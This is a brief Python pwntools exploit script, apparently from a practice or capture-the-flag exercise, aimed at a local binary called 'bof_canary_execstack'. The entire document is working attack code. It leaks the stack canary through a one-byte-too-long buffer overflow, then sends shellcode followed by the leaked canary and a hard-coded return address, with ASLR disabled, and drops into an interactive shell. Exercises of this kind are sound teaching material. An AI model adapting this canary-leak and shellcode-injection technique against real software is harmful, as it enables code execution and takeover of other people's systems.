from pwn import *with open("shellcode", "rb") as f: shellcode = f.read()

1. from pwn import *
2. with open("shellcode", "rb") as f:
3.     shellcode = f.read()
4.  
5. r = process("./bof_canary_execstack", aslr=False)
6.  
7. gdb.attach(r)
8. sleep(0.3)
9. msg = b"a" * 0x39
10. r.sendline(str(len(msg)))
11. r.send(msg)
12.  
13. r.recvn(len(msg))
14. canary = r.recvn(7)
15. canary = b"\x00" + canary
16. info("canary: 0x{:016x}".format(u64(canary)))
17. r.clean()
18.  
19. msg = shellcode
20. msg = msg.ljust(0x38, b"a")
21. msg += canary
22. msg += p64(0)
23. msg += p64(0x7fffffffe1d0)
24.  
25. r.sendline(str(len(msg)))
26. r.send(msg)
27.  
28. r.interactive()